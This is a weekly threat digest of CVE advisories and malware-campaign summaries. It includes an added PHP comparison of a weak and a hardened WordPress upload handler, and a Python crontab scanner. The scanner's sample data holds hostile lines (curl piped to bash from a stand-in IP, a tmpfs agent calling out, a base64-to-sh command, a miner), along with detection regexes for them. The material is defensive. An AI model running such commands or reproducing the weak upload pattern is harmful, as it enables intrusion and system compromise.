Weekly Threat Landscape Digest – Week 23

This week’s threat landscape highlights the evolving sophistication of threat actors, who are increasingly targeting newly disclosed and unpatched vulnerabilities. From zero-day attacks to advanced phishing campaigns, their techniques continue to grow in complexity. To mitigate these risks, organizations must adopt a proactive, layered security approach.
This includes timely patch management, continuous monitoring, and robust detection capabilities. Equally important is fostering a strong cybersecurity culture—one that is supported by real-time threat intelligence, ongoing awareness initiatives, and a well-defined incident response plan to minimize potential damage from emerging threats.
Mozilla Thunderbird and Firefox Updates
Mozilla has released security updates addressing multiple vulnerabilities in its Thunderbird and Firefox for iOS products. If exploited, these vulnerabilities could allow memory corruption, arbitrary code execution, or URL spoofing.
Key Details:
Thunderbird Vulnerabilities:
- CVE-2025-4918 – Out-of-Bounds Access in Promise Objects
- Severity: Critical
- Description: Improper memory handling in JavaScript Promise objects may result in out-of-bounds read/write, leading to memory corruption, information disclosure, or potential code execution.
- CVE-2025-4919 – Out-of-Bounds Access When Optimizing Linear Sums
- Severity: Critical
- Description: A flaw in array index handling can cause out-of-bounds read/write in JavaScript, which may result in memory corruption or arbitrary code execution.
Firefox for iOS Vulnerability:
- CVE-2025-5020 – URL Spoofing via Non-HTTP Schemes
- Severity: Low
- Description: Malicious URLs using non-HTTP schemes (e.g., mailto:, ftp:) could cause URL spoofing in Firefox for iOS when opened from other applications, increasing the risk of phishing attacks.
Fixed Versions:
- Thunderbird: 128.10.2, 138.0.2
- Firefox for iOS: Version 139
Mitigation/Workaround:
- Apply the security updates to Thunderbird and Firefox for iOS as soon as possible.
- Ensure that all endpoints are running the fixed versions mentioned above.
- Raise awareness among users regarding the risk of phishing and spoofing through malformed URLs.
References:
https://www.mozilla.org/en-US/security/advisories/mfsa2025-40/
https://www.mozilla.org/en-US/security/advisories/mfsa2025-41/
https://www.mozilla.org/en-US/security/advisories/mfsa2025-39/
GitLab CE and EE Vulnerability Fixes
GitLab has released critical and moderate severity security patches for both Community Edition (CE) and Enterprise Edition (EE) to address multiple vulnerabilities. These vulnerabilities impact server resource management, authentication enforcement, and data exposure controls. Unpatched systems remain at risk of denial-of-service, authentication bypass, and potential data leaks.
Key Details:
- CVE-2025-0993 – Unprotected large blob endpoint allows Denial of Service
- Severity: High (CVSS 7.5)
- Impact: Authenticated attackers may exhaust server resources.
- CVE-2024-12093 – Improper XPath validation allows SAML 2FA bypass
- Severity: Medium (CVSS 6.8)
- Impact: Modified SAML responses can bypass 2FA.
- CVE-2024-7803 – Discord webhook integration may cause DoS
- Severity: Medium (CVSS 6.5)
- Impact: Webhook misuse can overload the system.
- CVE-2025-3111 – Unbounded Kubernetes cluster tokens
- Severity: Medium (CVSS 6.5)
- Impact: Authenticated users may trigger denial-of-service.
- CVE-2025-2853 – Unvalidated notes position can lead to DoS
- Severity: Medium (CVSS 6.5)
- Impact: Faulty input allows abuse to crash note display.
- CVE-2025-4979 – Masked CI variables may be exposed
- Severity: Medium (CVSS 4.9)
- Impact: WebUI may display hidden variables.
- CVE-2025-0605 – Two-factor authentication bypass via group access
- Severity: Medium (CVSS 4.6)
- Impact: Certain users may circumvent 2FA enforcement.
- CVE-2025-0679 – Full email addresses exposed
- Severity: Medium (CVSS 4.3)
- Impact: Unauthorized users may access complete email addresses.
- CVE-2024-9163 – Branch name confusion in confidential MRs
- Severity: Low (CVSS 3.5)
- Impact: Merge request misdirection via logic flaw.
- CVE-2025-1110 – Unauthorized access to job data via GraphQL
- Severity: Low (CVSS 2.7)
- Impact: Privilege escalation via crafted GraphQL queries.
Impacted Versions and Fix Timeline:
- Affected Versions: GitLab CE/EE versions prior to 18.0.1, 17.11.3, 17.10.7
- Fixed Versions: 18.0.1, 17.11.3, 17.10.7
Mitigation/Workaround:
- Apply the security patches to all GitLab CE and EE instances.
- Monitor for any abnormal behavior or unauthorized access attempts.
- Review webhook configurations and access policies to minimize exposure.
- Validate Kubernetes cluster integrations and CI variable masking practices.
Reference:
https://about.gitlab.com/releases/2025/05/21/patch-release-gitlab-18-0-1-released/
Google Chrome Security Update
Google has released a security update for Chrome addressing eight vulnerabilities, including one high-severity issue. If exploited, these vulnerabilities could allow remote code execution, unauthorized access, and privilege escalation. Affected platforms include Windows, macOS, Android, and iOS.
Key Details:
- CVE-2025-5063 – Use-After-Free in Compositing
- Severity: High
- Impact: May allow attackers to execute arbitrary code remotely by exploiting memory management flaws.
- CVE-2025-5064 – Inappropriate Implementation in Background Fetch
- Severity: Medium
- Impact: Could lead to data leaks or unexpected behavior.
- CVE-2025-5065 – Inappropriate Implementation in FileSystemAccess API
- Severity: Medium
- Impact: May result in unauthorized file access or manipulation.
- CVE-2025-5066 – Inappropriate Implementation in Messages
- Severity: Medium
- Impact: May allow privilege escalation due to improper handling of browser messaging components.
- CVE-2025-5067 – Inappropriate Implementation in Tab Strip
- Severity: Low
- Impact: Minor functional issues within the browser’s UI components.
Fixed Versions:
- Desktop (Windows & macOS): Chrome 137.0.7151.40/.41
- Android: Chrome 135 (137.0.7151.44)
- iOS: Chrome Stable 137 (137.0.7151.34)
Mitigation/Workaround:
- Promptly update all Chrome browsers across Windows, macOS, Android, and iOS platforms to the fixed versions listed above.
- Encourage users to restart their browsers after updating to ensure patches are applied.
- Monitor endpoint browsers for compliance and unexpected behaviors.
- Raise awareness among employees about phishing or exploit campaigns targeting browser vulnerabilities.
References:
https://chromereleases.googleblog.com/2025/05/early-stable-update-for-desktop.html
https://chromereleases.googleblog.com/
Critical Vulnerability in NETGEAR Routers
A critical authentication bypass vulnerability has been identified in NETGEAR DGND3700v2 wireless routers. Exploitation of this flaw can lead to full administrative access, resulting in total network compromise, including risks such as credential theft, DNS hijacking, and persistent malware deployment.
Key Details:
- CVE ID: CVE-2025-4978
- Severity: Critical (CVSS v4 Score: 9.3)
- Description: A hidden backdoor in the embedded HTTP server of the NETGEAR DGND3700v2 router allows unauthenticated remote attackers to gain full administrative access without credentials. This may enable attackers to manipulate network settings, intercept communications, and deploy malware for persistent access.
Affected Product and Version:
- Product: NETGEAR DGND3700v2 Wireless Router
- Firmware Version Affected: V1.1.00.15_1.00.15NA
Fixed Version:
- Remediated in Firmware: V1.1.00.26 or later
Mitigation/Workaround:
- Immediately upgrade NETGEAR DGND3700v2 routers to firmware version V1.1.00.26 or newer.
- If upgrading is not feasible, consider isolating the router from internet access and replacing it with a more secure model.
- Monitor network traffic for suspicious activity, including unauthorized administrative access and DNS manipulation.
- Inform users of the risks associated with this vulnerability and the importance of firmware updates.
Reference:
https://nvd.nist.gov/vuln/detail/CVE-2025-4978
High-Severity Privilege Escalation Vulnerability in Apple Products
Apple has released critical security patches to address a high-severity vulnerability (CVE-2025-31219) in the XNU kernel, which underpins macOS, iOS, iPadOS, tvOS, watchOS, and visionOS. This flaw could allow local attackers with limited privileges to escalate access and execute arbitrary code with kernel-level control, posing serious risks of system compromise.
Key Details:
- CVE ID: CVE-2025-31219
- CVSS Score: 8.8 (AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
- Severity: High
- Root Cause: Race condition due to improper locking in the kernel’s virtual memory subsystem
Impact:
- Privilege escalation from low-privileged user to root/system level
- Arbitrary code execution with full system control
- Potential system compromise and denial-of-service via memory corruption
- Exploit Status: No known public exploitation as of publication
- Disclosure: Responsibly disclosed via Trend Micro’s Zero Day Initiative
Affected Platforms and Versions:
- macOS Sequoia: Versions prior to 15.5
- macOS Sonoma: Versions prior to 14.7.6
- macOS Ventura: Versions prior to 13.7.6
- iOS/iPadOS: Versions prior to 18.5
- tvOS: Versions prior to 18.5
- watchOS: Versions prior to 11.5
- visionOS: Versions prior to 2.5
Fixed Versions:
- macOS Sequoia: 15.5
- macOS Sonoma: 14.7.6
- macOS Ventura: 13.7.6
- iOS/iPadOS: 18.5
- tvOS: 18.5
- watchOS: 11.5
- visionOS: 2.5
Mitigation/Workaround:
- Apply the latest security updates for all listed Apple platforms immediately.
- Ensure all managed Apple devices are updated via MDM or centralized patch management tools.
- Monitor devices for signs of unusual privilege elevation or system instability.
Reference:
https://www.zerodayinitiative.com/advisories/ZDI-25-305/
Cross-Site Scripting (XSS) Vulnerability in Bitwarden
A medium-severity DOM-based Cross-Site Scripting (XSS) vulnerability (CVE-2025-5138) has been identified in Bitwarden, a widely used password management solution. The flaw could allow attackers to inject and execute malicious JavaScript within the Bitwarden web application, potentially leading to account compromise, credential theft, and unauthorized actions.
Key Details:
- CVE ID: CVE-2025-5138
- Severity: Medium
- Vulnerability Type: DOM-based Cross-Site Scripting (XSS)
- Affected Component: PDF File Handler within the Resources upload feature
- Root Cause: Insufficient file type validation and inadequate input neutralization
- Attack Vector: Malicious PDF upload containing JavaScript payload
Impact:
- JavaScript execution in the context of authenticated user sessions
- Account hijacking through stolen session tokens or credentials
- Credential theft via browser-based exploitation
- Proof-of-Concept Exploit: Publicly available, increasing exploitation risk
Impacted Versions and Fix Timeline:
- Affected Versions: Bitwarden versions 2.25.1 and earlier
- Fixed Version: Security update pending; users should upgrade to a version newer than 2.25.1 once released
Mitigation/Workaround:
- Do not upload untrusted PDFs within Bitwarden until patched
- Update immediately once the fixed version is available
- Enable Web Application Firewalls (WAFs) to block malicious upload attempts
- Monitor for suspicious activity, such as unauthorized logins or session anomalies
Reference:
https://nvd.nist.gov/vuln/detail/CVE-2025-5138
Security Updates – Tenable Network Monitor
Tenable has released version 6.5.1 of Tenable Network Monitor, addressing multiple high-severity vulnerabilities, including local privilege escalation flaws and weaknesses in bundled third-party libraries. These vulnerabilities could allow attackers to escalate privileges or compromise system integrity.
Key Details:
- CVE-2025-24916
- CVSS Score: 7.0 (High)
- Description: Insecure permissions on sub-directories created during non-default installations on Windows systems
- Impact: May allow unauthorized users to escalate privileges locally and compromise system integrity
- CVE-2025-24917
- CVSS Score: 7.8 (High)
- Description: Vulnerability allows non-administrative users to stage malicious files which can be executed with SYSTEM-level privileges
- Impact: Potential full system compromise through local privilege escalation
Third-Party Libraries Updated in Version 6.5.1:
- OpenSSL upgraded to version 3.0.16
- expat upgraded to version 2.7.0
- curl upgraded to version 8.12.0
- libpcap upgraded to version 1.10.5
- libxml2 upgraded to version 2.13.8
Affected Products:
- All versions of Tenable Network Monitor released prior to version 6.5.1 are vulnerable
Mitigation/Workaround:
- Update all Tenable Network Monitor deployments to version 6.5.1 or later without delay
- Review local installation paths, especially for Windows deployments, to ensure permissions are secured
- Monitor systems for signs of unauthorized privilege escalation
- Validate that all bundled libraries are up to date
Reference:
https://www.tenable.com/security/tns-2025-10
Critical Vulnerability in TI WooCommerce Wishlist Plugin
A critical security vulnerability in the TI WooCommerce Wishlist plugin for WordPress (CVE-2025-47577) allows unauthenticated remote attackers to upload arbitrary files—such as executable PHP scripts—potentially leading to full remote code execution (RCE) on affected servers. This issue remains unpatched at the time of this advisory.
Key Details:
- CVE ID: CVE-2025-47577
- CVSS Base Score: 10.0 (Critical)
- Affected Component: tinvwl_upload_file_wc_fields_factory function in integrations/wc-fieldsfactory.php
- Root Cause: Security checks in the file upload mechanism are disabled via ‘test_type’ => false, allowing arbitrary files to be uploaded
- Exploit Conditions: Requires the WC Fields Factory plugin to be active alongside the wishlist plugin
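The 'test_type' => false root cause described above, shown as an added illustration that is not the plugin's own code: a WordPress upload handler that switches off the core file-type check beside a hardened handler that keeps it, restricts accepted types to an allowlist and authorizes the request first. Function names, the capability and the nonce action are assumptions; the WordPress core functions called are real.

```php
<?php
// Added illustration; not code from the TI WooCommerce Wishlist plugin or
// WC Fields Factory. Function names, the nonce action and the capability
// used below are assumptions. wp_handle_upload(), wp_check_filetype_and_ext(),
// current_user_can() and wp_verify_nonce() are real WordPress core functions.

// WEAK PATTERN (the root-cause class named in the advisory): passing
// 'test_type' => false tells wp_handle_upload() to skip its MIME/extension
// check, so a file with any extension is moved into wp-content/uploads.
function example_weak_upload_handler( array $file ) {
    $overrides = array(
        'test_form' => false,
        'test_type' => false, // the type check is switched off here
    );
    return wp_handle_upload( $file, $overrides );
}

// HARDENED PATTERN: authorize the request, keep 'test_type' on (the default),
// and narrow the accepted types to an explicit allowlist for the feature.
function example_hardened_upload_handler( array $file, string $nonce ) {
    // Unauthenticated requests must never reach the filesystem. The
    // capability name is an assumption; use the one the feature really needs.
    if ( ! is_user_logged_in() || ! current_user_can( 'upload_files' ) ) {
        return new WP_Error( 'forbidden', 'You are not allowed to upload files.' );
    }
    // CSRF check; 'example_wishlist_upload' is an assumed nonce action.
    if ( ! wp_verify_nonce( $nonce, 'example_wishlist_upload' ) ) {
        return new WP_Error( 'bad_nonce', 'Invalid request token.' );
    }

    // Allowlist: extension pattern => MIME type. wp_check_filetype_and_ext()
    // rejects anything outside this map and, for images, also inspects the
    // real file content, so a PHP script renamed to .png is refused.
    $allowed_mimes = array(
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'pdf'      => 'application/pdf',
    );

    // Pre-check the extension ourselves as a second, independent gate.
    $ext         = strtolower( pathinfo( $file['name'], PATHINFO_EXTENSION ) );
    $ext_allowed = false;
    foreach ( array_keys( $allowed_mimes ) as $pattern ) {
        if ( in_array( $ext, explode( '|', $pattern ), true ) ) {
            $ext_allowed = true;
            break;
        }
    }
    if ( ! $ext_allowed ) {
        return new WP_Error( 'bad_type', 'File type not permitted.' );
    }

    // Confirm the extension and the detected MIME type agree before handing over.
    $check = wp_check_filetype_and_ext( $file['tmp_name'], $file['name'], $allowed_mimes );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        return new WP_Error( 'bad_type', 'File content does not match its extension.' );
    }

    $overrides = array(
        'test_form' => false,
        'test_type' => true,           // keep the core check switched on
        'mimes'     => $allowed_mimes, // and restrict it to the allowlist
    );
    $result = wp_handle_upload( $file, $overrides );
    if ( isset( $result['error'] ) ) {
        return new WP_Error( 'upload_failed', $result['error'] );
    }
    return $result; // array with 'file', 'url' and 'type' on success
}
```

Even with the hardened handler, the uploads directory should be served with script execution disabled at the web-server level, which is the "restrict execution permissions" mitigation listed below.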
Impact:
- Full remote code execution (RCE)
- Website defacement
- Data exfiltration
- Malware deployment
Affected Versions:
- All versions up to and including 2.9.2
Mitigation/Workaround:
- Immediately deactivate and remove the TI WooCommerce Wishlist plugin from all websites
- Conduct a full server file audit to identify unauthorized uploads or malicious scripts
- Implement the following mitigations:
- Web Application Firewall (WAF) to block suspicious uploads
- File Integrity Monitoring to detect unauthorized file changes
- Restrict execution permissions on uploaded files and directories
- Monitor the official plugin page and trusted advisories for updates regarding a patched version
- If continued wishlist functionality is necessary, consider alternative plugins with active development and security reviews
References:
https://patchstack.com/articles/unpatched-critical-vulnerability-in-ti-woocommerce-wishlist-plugin/
https://nvd.nist.gov/vuln/detail/CVE-2025-47577
Mozilla Products: Multiple Vulnerabilities and Critical Double-Free in libvpx
Mozilla has issued several security advisories addressing multiple vulnerabilities across its Firefox and Thunderbird product lines, including Extended Support Releases (ESR). These vulnerabilities pose significant risks such as memory corruption, cross-origin data leakage, code execution, and clickjacking. A critical double-free vulnerability in the libvpx encoder used for WebRTC (CVE-2025-5262) stands out for its potential to cause exploitable crashes.
Key Details:
- CVE-2025-5262 – Double-Free in libvpx Encoder
- Severity: Critical
- Description: A double-free may occur in vpx_codec_enc_init_multi if a memory allocation fails during initialization of the encoder used in WebRTC. This can result in memory corruption and lead to application crashes that are potentially exploitable by attackers.
Other vulnerabilities addressed:
- Cross-origin data leak vectors
- Local code execution weaknesses
- Clickjacking and spoofing flaws in user interface elements
Affected Products:
- Firefox: Versions prior to 139
- Firefox ESR: Versions prior to 115.24 and 128.11
- Thunderbird: Versions prior to 139 and 128.11
Mitigation/Workaround:
- Apply the latest security patches for Firefox, Firefox ESR, and Thunderbird immediately
- Monitor systems for abnormal browser behavior or crash events
- Educate users on risks such as clickjacking and cross-origin spoofing to reduce user-targeted threats
References:
https://www.mozilla.org/en-US/security/advisories/mfsa2025-42/
https://www.mozilla.org/en-US/security/advisories/mfsa2025-43/
https://www.mozilla.org/en-US/security/advisories/mfsa2025-44/
https://www.mozilla.org/en-US/security/advisories/mfsa2025-45/
https://www.mozilla.org/en-US/security/advisories/mfsa2025-46
Google Patches Actively Exploited Chrome Zero-Day (CVE-2025-5419)
A high-severity vulnerability in the V8 JavaScript and WebAssembly engine used by Google Chrome (CVE-2025-5419) has been actively exploited in the wild. This flaw allows remote attackers to trigger heap corruption through a specially crafted HTML page, potentially leading to arbitrary code execution in the context of the browser.
Key Details:
- CVE: CVE-2025-5419
- Severity: High
- CVSS Score: 8.3
- Impact: Arbitrary code execution, system compromise
Affected Products:
- Google Chrome versions prior to 137.0.7151.68 on Windows, macOS, and Linux
- Other Chromium-based browsers (e.g., Microsoft Edge, Brave, Opera, Vivaldi) may also be impacted
Fixed Version:
- Chrome 137.0.7151.68 for Linux
- Chrome 137.0.7151.68/.69 for Windows and macOS
Mitigation/Workaround:
- Update Google Chrome to version 137.0.7151.68/.69 as soon as possible
- Watch for updates and patch Chromium-based browsers promptly
- Avoid opening untrusted links or websites until updated
References:
https://thehackernews.com/2025/06/new-chrome-zero-day-actively-exploited.html
https://nvd.nist.gov/vuln/detail/CVE-2025-5419
https://chromereleases.googleblog.com/
Everest Ransomware Targets Department of Culture and Tourism Abu Dhabi
On May 26, 2025, the Everest ransomware group claimed responsibility for a cyberattack on the Department of Culture and Tourism Abu Dhabi (DCT Abu Dhabi), exfiltrating 12GB of sensitive data, including employee records, passport copies, and internal documents. The group has threatened to leak the data unless a ransom is paid by June 1, underscoring their focus on high-profile targets in the Middle East.
Key Details:
Impact:
- Theft and public leakage of sensitive corporate and personal data
- Operational disruptions
- Reputational and legal damage
- Increased likelihood of ransom payment due to high-stakes pressure tactics
Recent Activity:
- Everest has also targeted Coca-Cola’s Middle East operations, Mediclinic, and Jordan Kuwait Bank in recent weeks
- Tactics center on data theft and public exposure rather than encryption, using a dark web leak site to pressure victims
Affected Product:
- No specific software product implicated; organizations with exposed remote services, unpatched systems, or weak identity controls are at risk
Mitigation/Workaround:
- Conduct regular audits for exposed services (e.g., RDP, VPN, cloud management ports)
- Enforce multi-factor authentication and credential hygiene
- Monitor for signs of compromise, including data exfiltration or access anomalies
- Prepare and test incident response plans
- Regularly back up critical data and store it offline
- Monitor leak sites for mentions of your organization
Earth Kurma APT Campaign
The Earth Kurma group is actively targeting government and telecommunications sectors in Southeast Asia, including the Philippines, Vietnam, Thailand, and Malaysia. Using rootkits and cloud-based tools, they focus on data exfiltration and maintaining persistent access through spear-phishing and exploitation of public-facing applications.
Key Details:
Tactics:
- Spear-phishing emails with malicious attachments
- Exploiting known vulnerabilities in public-facing applications
- Deployment of custom malware, rootkits, and cloud-based services for long-term espionage
Impact:
- Credential theft via keylogging tools
- Exfiltration of sensitive files using public cloud services (Dropbox, OneDrive)
- Deployment of advanced malware loaders and rootkits
- Prolonged undetected access with stealth techniques
- Full-featured remote access capabilities (process hiding, shellcode injection, network concealment)
Indicators of Compromise (IOCs):
Mitigation/Workaround:
- Patch all systems and public-facing applications promptly
- Restrict and monitor admin privileges; use separate accounts for sensitive operations
- Audit and log cloud storage usage (Dropbox, OneDrive) for unusual activity
- Limit and monitor PowerShell and WMI usage
- Watch for new or suspicious services, DLLs, and hidden files
- Deploy EDR/XDR solutions for advanced threat detection
- Segment networks to contain lateral movement
- Regularly audit scheduled tasks and startup items for persistence
- Enable comprehensive logging and set alerts for suspicious or anomalous activity
Cisco Enterprise Platform Vulnerabilities
Cisco has disclosed several high-impact vulnerabilities affecting its Identity Services Engine (ISE), Contact Center Intelligence Center (CUIC), and Unified Contact Center Express (CCX) products. These flaws could allow attackers to disrupt network access control, escalate privileges, or access unauthorized data.
Key Details:
- CVE-2025-20152 (ISE RADIUS DoS):
- Severity: High (CVSS 8.6)
- Impact: Unauthenticated remote attackers can crash the RADIUS service in Cisco ISE 3.4 by sending specially crafted authentication requests, causing service restarts or outages.
- Affected: Cisco ISE 3.4 (fixed in 3.4 Patch 1). Earlier versions are not affected.
- CVE-2025-20113 (CUIC Admin Privilege Escalation):
- Severity: High (CVSS 7.1)
- Impact: Authenticated users can escalate privileges to admin via the CUIC web interface.
- Affected: CUIC 12.5 (fixed in 12.5(1)SU ES04), CUIC 12.6 (fixed in 12.6(2)ES04).
- CVE-2025-20114 (CUIC Horizontal Privilege Escalation):
- Severity: Medium (CVSS 4.3)
- Impact: Authenticated users may access or modify other users’ dashboards.
- Affected: CUIC 12.5 and 12.6 (fixed in above ES04 releases).
- Unified CCX: Versions 12.5(1)SU3 and earlier are impacted via CUIC integration; migration to a fixed CUIC version is required.
Mitigation/Workaround:
- Upgrade Cisco ISE to 3.4 Patch 1 or later.
- Apply the latest ES04 updates to CUIC 12.5 and 12.6.
- Migrate Unified CCX instances to use updated CUIC versions.
- Monitor ISE RADIUS logs for abnormal authentication activity and set alerts for service disruptions.
- Audit CUIC access logs and privilege assignments; enforce least privilege.
- Restrict administrative web interfaces to internal networks or secure VPNs.
References:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-restart-ss-uf986G2Q
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cuis-priv-esc-3Pk96SU4
Reflected XSS in PAN-OS GlobalProtect (CVE-2025-0133)
A reflected cross-site scripting (XSS) vulnerability in Palo Alto Networks’ PAN-OS GlobalProtect portal and gateway (CVE-2025-0133) allows attackers to inject JavaScript into authenticated user sessions. The risk is heightened when the Clientless VPN feature is enabled, and a public proof-of-concept is available.
Key Details:
- CVE: CVE-2025-0133
- Type: Reflected XSS
- Severity: CVSS 5.1 (Low) without Clientless VPN, 6.9 (Medium) with Clientless VPN
- Attack Vector: Remote, via crafted URLs
- Impacted: PAN-OS 11.2.0–11.2.6 (fix in 11.2.7, ETA June 2025), 11.1.0–11.1.10 (fix in 11.1.11, ETA July 2025), 10.2.0–10.2.16 and 10.1.0–10.1.14 (fix in 10.2.17, ETA August 2025). Older versions require upgrade to a supported release.
Mitigation/Workaround:
- Schedule and apply the latest PAN-OS updates as soon as they are available.
- Disable Clientless VPN if not essential, especially on externally accessible portals.
- Train users to avoid clicking on suspicious or untrusted links, particularly those received via email or chat.
Reference:
https://security.paloaltonetworks.com/CVE-2025-0133
LummaC2 Infostealer Campaign
LummaC2, a modular infostealer, is being used in a global campaign targeting organizations through phishing and fake software downloads. The malware is capable of stealing credentials, session tokens, browser data, cryptocurrency wallets, and multi-factor authentication information. It employs in-memory execution, encrypted C2 communications, and self-deletion to evade detection.
Key Details:
- Delivery: Phishing emails, malicious attachments, fake installers, and bundled software.
- Execution: Uses fake CAPTCHA popups, clipboard scripts, and Windows Run commands to trigger infection.
Capabilities:
- In-memory operation to avoid detection
- Exfiltration of browser credentials, cookies, crypto wallets, and MFA data
- Clipboard abuse and Windows Run execution
- Beaconing to encrypted C2 servers
- Self-deletion and payload loading for persistence
Mitigation/Workaround:
- Deploy advanced email and endpoint security with behavioral analysis and memory scanning.
- Train users to recognize phishing, suspicious downloads, and social engineering tactics like fake CAPTCHAs.
- Monitor outbound network traffic for unusual domains and restrict script execution.
- Enforce least privilege and keep all systems and applications fully patched.
Reference:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141b
Critical Authentication Bypass in Cisco ISE Cloud Deployments (CVE-2025-20286)
Cisco has patched a critical static credential vulnerability in its Identity Services Engine (ISE) affecting cloud deployments on AWS, Azure, and Oracle Cloud Infrastructure (OCI). This flaw (CVE-2025-20286, CVSS 9.9) could allow unauthenticated remote attackers to access sensitive data, perform limited administrative actions, modify configurations, or disrupt services.
Key Details:
- CVE: CVE-2025-20286
- Severity: Critical (CVSS 9.9)
- Vulnerability Type: Static credential flaw in cloud deployments
Impacted Platforms:
- AWS: Cisco ISE 3.1, 3.2, 3.3, 3.4
- Azure: Cisco ISE 3.2, 3.3, 3.4
- OCI: Cisco ISE 3.2, 3.3, 3.4
- Root Cause: Improper credential generation leads to shared static credentials for each release/platform combination, making it possible for attackers to use credentials from one deployment to access others on the same platform and release.
Attack Scenario:
- An attacker with knowledge of the static credentials for a specific ISE release and cloud platform can access any deployment with matching parameters, potentially extracting credentials, accessing sensitive data, or disrupting services.
- Only cloud-based Primary Administration nodes are affected; on-premises deployments are not impacted.
Mitigation/Workaround:
- Apply Cisco’s security patches for all affected cloud deployments immediately.
- Restrict network access to Cisco ISE administration interfaces to authorized administrators only.
- If immediate patching is not possible, use the “application reset-config ise” command to reset user passwords (note: this will reset the system to factory defaults).
- Monitor for unauthorized access attempts and review cloud firewall rules to limit exposure.
References:
https://thehackernews.com/2025/06/critical-cisco-ise-auth-bypass-flaw.html
Chaos RAT Malware Targets Windows and Linux via Fake Network Tool Downloads
A new variant of the open-source Chaos RAT is being actively deployed in attacks against both Windows and Linux systems. Threat actors are distributing the malware by disguising it as legitimate network troubleshooting utilities, particularly targeting Linux environments.
Key Details:
- Malware: Chaos RAT (Remote Access Trojan), written in Golang for cross-platform support
- Distribution: Delivered via phishing emails with malicious links or attachments, often masquerading as network tools (e.g., “NetworkAnalyzer.tar.gz”)
Capabilities:
- Establishes remote control sessions
- Launches reverse shells
- Uploads, downloads, and deletes files
- Takes screenshots and gathers system information
- Locks, restarts, or shuts down infected machines
- Opens arbitrary URLs
- Modifies Linux crontab for persistence
Observed Use:
- Frequently paired with cryptocurrency mining campaigns (e.g., XMRig miner)
- Used for reconnaissance and information gathering on compromised devices
- Latest Version: 5.0.3 (released May 31, 2024)
Vulnerabilities in Chaos RAT Admin Panel:
- CVE-2024-30850: Command injection vulnerability (CVSS 8.8)
- CVE-2024-31839: Cross-site scripting (XSS) flaw (CVSS 4.8)
- Both issues have been patched as of May 2024.
Additional Threats:
- Recent campaigns also target Trust Wallet users on desktop, distributing counterfeit wallet apps via phishing and deceptive downloads to steal credentials, seed phrases, and private keys.
Mitigation/Workaround:
- Educate users to avoid downloading network tools or wallet software from untrusted sources.
- Monitor for suspicious cron job modifications and unexpected scheduled tasks, especially on Linux systems.
- Deploy endpoint protection capable of detecting in-memory malware and reverse shell activity.
- Patch Chaos RAT admin panels to the latest version to address known vulnerabilities.
- Regularly audit systems for unauthorized software and monitor for signs of credential theft or clipboard abuse.
References:
https://thehackernews.com/2025/06/chaos-rat-malware-targets-windows-and.html
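The crontab monitoring recommended above, as an added example that is not part of the original digest: a small scanner that splits each crontab entry into schedule and command and flags the persistence patterns a RAT or miner dropper typically leaves (download piped to a shell, execution from a tmpfs path, base64-decoded commands, known miner binaries). The crontab content, hostnames and addresses are constructed for the example.

```python
import re

# Constructed sample crontab (not from the original report). The last four entries
# imitate persistence patterns such as the crontab entries Chaos RAT is reported to add.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/apt-get update -qq
*/5 * * * * /usr/local/bin/backup.sh >/dev/null 2>&1
* * * * * curl -s http://198.51.100.7/x.sh | bash
@reboot /tmp/.NetworkAnalyzer/agent -c 203.0.113.9:8080
*/10 * * * * echo ZWNobyBoaQ== | base64 -d | sh
@reboot /dev/shm/.x/xmrig -o pool.invalid:3333
"""

# Detection rules applied to the command part of each entry: (name, regex).
RULES = [
    ("download-to-shell", re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba|z|da)?sh\b")),
    ("exec-from-tmpfs", re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/")),
    ("base64-decode-to-shell", re.compile(r"base64\s+(-d|--decode)[^|]*\|\s*(ba|z|da)?sh\b")),
    ("known-miner-binary", re.compile(r"\b(xmrig|t-rex)\b")),
]

# Five time fields, or an @-shortcut, followed by the command.
SCHEDULE_RE = re.compile(
    r"^(?:@(?:reboot|hourly|daily|weekly|monthly|yearly|annually)|(?:\S+\s+){5})(.*)$"
)

def split_cron_line(line):
    """Return the command portion of a crontab line, or None for blanks and comments."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    m = SCHEDULE_RE.match(line)
    return m.group(1).strip() if m else line

def scan_crontab(text):
    """Return (line_no, rule_name, command) for every rule that matches an entry."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        cmd = split_cron_line(line)
        if cmd is None:
            continue
        for name, rx in RULES:
            if rx.search(cmd):
                findings.append((n, name, cmd))
    return findings

if __name__ == "__main__":
    for n, name, cmd in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {n}: {name}: {cmd}")
```

In practice the same function can be fed the output of `crontab -l -u <user>` for each account and the files under /etc/cron.d, and run on a schedule so that new entries are flagged soon after they appear.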
NetSupport RAT Delivered via Fake DocuSign and Gitcode Sites Using Multi-Stage PowerShell Attacks
A new campaign is leveraging counterfeit DocuSign and Gitcode websites to distribute NetSupport RAT through a sophisticated, multi-stage PowerShell attack chain. The operation relies on social engineering to trick users into executing malicious scripts,
ultimately granting attackers remote access to compromised systems.
Key Details:
- Malware: NetSupport RAT (legitimate remote administration tool abused for malicious purposes)
Delivery Method:
- Fake DocuSign and Gitcode sites prompt users to complete a CAPTCHA or follow instructions, which covertly copies an obfuscated PowerShell command to the clipboard (clipboard poisoning).
- Victims are instructed to paste and run the script via the Windows Run dialog, initiating the infection chain.
Attack Flow:
- Initial PowerShell script downloads a secondary script from an external server (e.g., tradingviewtool[.]com).
- Subsequent scripts fetch additional payloads, including a persistence mechanism (“wbdims.exe”) and a ZIP archive containing “jp2launcher.exe.”
- The final stage executes NetSupport RAT, granting attackers remote control.
Evasion Techniques:
- Multi-stage scripting to bypass detection and complicate analysis
- Use of legitimate tools (NetSupport Manager) to blend in with normal administrative activity
- ClickFix-style CAPTCHAs and social engineering to increase user compliance
Associated Infrastructure:
- Malicious domains include:
- tradingviewtool[.]com
- docusign.sa[.]com
Mitigation/Workaround:
- Educate users to avoid running scripts or commands from untrusted websites, especially those received via email or social media.
- Monitor for clipboard manipulation and suspicious PowerShell activity on endpoints.
